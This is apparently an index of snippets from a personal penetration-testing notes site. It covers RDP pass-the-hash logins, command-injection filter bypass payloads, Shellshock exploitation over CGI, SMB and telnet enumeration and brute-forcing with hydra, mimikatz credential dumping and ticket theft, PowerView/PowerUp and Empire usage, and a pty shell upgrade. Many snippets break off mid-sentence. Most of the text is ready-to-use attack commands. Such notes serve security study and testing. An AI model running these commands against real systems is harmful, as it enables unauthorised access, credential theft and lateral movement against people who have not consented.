Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target To log in with a NTML hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…
Shellter kann add a reverse shell payload into a exe file.
Configuration options env_reset: Resets the environment to default configured in /etc/environment. env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user failed to provide a sudo password. secure_path: Sets the PATH environment variable to the given paths. Configurations Something like the following…
This post contains a collection of variable substitution commands. Bash $(echo id) Ruby #{} PHP {}
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL encoded values starting with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
Show shares with smbclient: smbclient --no-pass -L //$targetsmbclient -U guest //$target/smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory Show shares with other clients: smbmap -R -H $target // No usersmbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // Usernmap -sV --script=smb-enum-shares -p445 $targetcrackmapexec smb $target -u '' -p '' --shares Vulnerability scan nmap --script=smb-vul* -p445 $target…
Enumeration Mandatory Optional Tools
Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to been uploaded first or it has to be known how to communicate with it. General A Java registry daemon has to be running. Run rmiregistry (bundled with Java) from…
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: Try the reverse shell example in Burp also if the curl command fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
Shellshock A function in a environment variable is executed in a child process of the bash. When exporting a new function like this export func=’() { echo mist; }; echo aha;’ and starting a new bash session, “aha” is executed.
NTML infos nmap -p 23 --script telnet-ntlm-info $target Brute-force nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=5s $target hydra -P passwords.txt -L users.txt $target telnet -V hydra -C users_and_passwords.txt $target telnet -V
Local file inclusion and Wrappers General: If you try to read PHP and nothing returns — use a base64 return! Remote file inclusion PHP deserialization If a program accepts a serialized object which uses a magic method, then… TODO, see here
Logon on another system with a NTLM hash Scenario: Then, use mimikatz to inject another user’s NTLM hash into the secret storage: Steal another user’s session Scenario: Then, with the use of mimikatz: privilege::debugsekurlsa::tickets /export This exports available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
Windows creates and stores credentials in the Local Security Authority Subsystem Service LSASS in the memory. On the filesystem, the sam database stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDebugPrivilege so that we are able to communicate with other processes. privilege:debug Try to elevate privileges to obtain SYSTEM user privileges:…
BloodHound analyzes and present Active Directory Data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
Collection of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which does not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
Generic analysis tools Extract macros with oledump Use oledump.py to extract macros. List the file contents: python oledump.py $file Example from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a document part use the first number and execute python oledump.py -s $no $file But to extract Macros,…
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';